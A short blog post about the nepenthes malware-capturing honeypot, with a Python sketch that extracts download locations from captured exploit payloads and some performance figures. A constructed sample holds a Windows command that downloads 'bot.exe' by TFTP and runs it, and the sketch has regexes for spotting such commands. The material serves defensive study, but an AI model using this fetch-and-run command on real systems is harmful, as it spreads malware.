Nepenthes Scalability

Saturday, January 7. 2006
nepenthes is a versatile tool to capture propagating malware. The basic principle is the following: the tool simulates known vulnerabilities and waits for them to be exploited. Once nepenthes detects an exploitation attempt, it plays along with the incoming exploit and analyzes the delivered payload. This analysis yields several pieces of information (for example the protocol, host, and file name the payload tries to fetch), which can be combined to download the malware from the remote system. Thus it is possible to download malware that tries to propagate within the network in an automated way.
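To make the "analyze the payload, combine the pieces, download" step concrete, here is a small Python sketch written for this page (it is not nepenthes code and does not reproduce its shellcode handlers). It assumes constructed sample payloads, a tiny set of plaintext patterns (a `tftp ... get` command and an `http`/`ftp` URL), and a single-byte XOR brute force in place of the real decoder emulation; a "submission" is then just the hash and size of the downloaded bytes.

```python
import hashlib
import re

# Constructed sample payloads (not real captures): roughly what a simulated
# vulnerable service receives from a worm right after the "exploit" succeeds.
SAMPLE_TFTP = b"\x90" * 16 + b"cmd /c tftp -i 192.0.2.10 get bot.exe & start bot.exe\x00"
SAMPLE_URL = b"\x90" * 8 + b"\x00http://203.0.113.5:8080/x/bot.exe\x00"
# Same idea, but the URL is hidden behind a single-byte XOR decoder (key 0x99).
SAMPLE_XOR = bytes(b ^ 0x99 for b in b"\x00ftp://198.51.100.7/update.exe\x00")

# Simplified pattern table (hypothetical; nepenthes knows many more variants).
TFTP_RE = re.compile(
    rb"tftp(?:\.exe)?\s+(?:-i\s+)?([0-9A-Za-z.\-]+)\s+get\s+([0-9A-Za-z._\-]+)")
URL_RE = re.compile(
    rb"(https?|ftp)://([0-9A-Za-z.\-]+)(?::(\d{1,5}))?(/[0-9A-Za-z./_\-]*)")
DEFAULT_PORT = {"http": 80, "https": 443, "ftp": 21, "tftp": 69}


def extract_download_jobs(payload: bytes):
    """Turn a captured payload into download jobs (proto, host, port, path).

    Key 0 scans the payload as-is; every other key is a single-byte XOR
    guess, standing in for the decoder emulation a real sensor would do.
    """
    jobs, seen = [], set()
    for key in range(256):
        buf = payload if key == 0 else bytes(b ^ key for b in payload)
        found = []
        for m in TFTP_RE.finditer(buf):
            found.append(("tftp", m.group(1).decode(), 69, m.group(2).decode()))
        for m in URL_RE.finditer(buf):
            proto = m.group(1).decode()
            port = int(m.group(3)) if m.group(3) else DEFAULT_PORT[proto]
            found.append((proto, m.group(2).decode(), port, m.group(4).decode()))
        for proto, host, port, path in found:
            if (proto, host, port, path) in seen:
                continue  # same location seen under another key
            seen.add((proto, host, port, path))
            jobs.append({"proto": proto, "host": host, "port": port,
                         "path": path, "xor_key": key})
    return jobs


def record_submission(job: dict, blob: bytes):
    """What a successful download becomes: a submission keyed by its hash."""
    return {
        "source": f"{job['proto']}://{job['host']}:{job['port']}{job['path']}",
        "size": len(blob),
        "md5": hashlib.md5(blob).hexdigest(),
        "sha256": hashlib.sha256(blob).hexdigest(),
    }


if __name__ == "__main__":
    for name, sample in (("tftp", SAMPLE_TFTP), ("url", SAMPLE_URL), ("xor", SAMPLE_XOR)):
        for job in extract_download_jobs(sample):
            print(name, job)
    # Stand-in for the fetched file (constructed bytes, not a real sample).
    fake_binary = b"MZ" + b"\x00" * 62
    print(record_submission(extract_download_jobs(SAMPLE_XOR)[0], fake_binary))
```

Each job maps onto one of the counters in the figures below: a parsed job is a logged download attempt, and `record_submission` is what gets logged once the fetch actually succeeds; the gap between the two numbers is mostly hosts that have already gone offline or point at dead URLs.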

Here are some figures that illustrate the scalability of nepenthes. They show the performance of nepenthes on a 2.6 GHz Pentium 4 with 2 GB RAM and a 100 Mbit NIC. The machine listens on a /18 network (i.e., 16,384 IP addresses) and simulates vulnerable services on all of them.

Figures (the plots themselves are not preserved here; only their titles survive):

  • Number of established connections
  • Number of logged downloads (i.e., download attempts)
  • Number of logged submissions (i.e., successful downloads)
  • Average load


This data was captured on 2006-01-06.

testing the setup...

Saturday, January 7. 2006
This entry is the starting point of this weblog. The focus of this blog will be on honeynets, but I will also write about other IT-security related events. Let's see how things work out...